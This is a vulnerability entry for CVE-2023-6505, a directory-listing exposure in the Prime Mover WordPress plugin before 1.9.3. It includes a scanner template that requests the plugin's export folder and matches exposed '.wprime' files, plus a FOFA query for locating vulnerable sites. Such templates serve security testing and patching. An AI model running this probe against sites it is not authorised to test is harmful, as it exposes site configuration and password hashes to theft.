CVE-2023-6505: Prime Mover < 1.9.3 - Sensitive Data Exposure

2025-08-01 Prime Mover PoC Public

Description

Prime Mover plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.9.2 via directory listing in the 'prime-mover-export-files/1/' folder. This makes it possible for unauthenticated attackers to extract sensitive data including site and configuration information, directories, files, and password hashes.

PoC

id: CVE-2023-6505

info:
  name: Prime Mover < 1.9.3 - Sensitive Data Exposure
  author: s4e-io
  severity: high
  description: |
    Prime Mover plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.9.2 via directory listing in the 'prime-mover-export-files/1/' folder. This makes it possible for unauthenticated attackers to extract sensitive data including site and configuration information, directories, files, and password hashes.
  impact: |
    Unauthenticated attackers can exploit directory listing to access export files containing sensitive site configuration data, database information, and password hashes from WordPress Prime Mover installations.
  remediation: |
    Fixed in 1.9.3
  reference:
    - https://wpscan.com/vulnerability/eca6f099-6af0-4f42-aade-ab61dd792629
    - https://research.cleantalk.org/cve-2023-6505-prime-mover-poc-exploit/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6505
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-6505
    epss-score: 0.39867
    epss-percentile: 0.9855
    cpe: cpe:2.3:a:codexonics:prime_mover:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: codexonics
    product: prime_mover
    framework: wordpress
    fofa-query: body="/wp-content/plugins/prime-mover"
  tags: cve,cve2023,wp,wp-plugin,wordpress,exposure,prime-mover,listing,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/uploads/prime-mover-export-files/1/"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Index of /wp-content/uploads/prime-mover-export-files/1"
          - ".wprime"
        condition: or

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c2551ff25d3194b342ad58d701abfba5122b53c519a3808b14b1491e27acaa9d02200a3b38a1c98ae0b00b3bdf3b45284b2f50e53c4bfa1c4372b73fb78381b73f0a:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities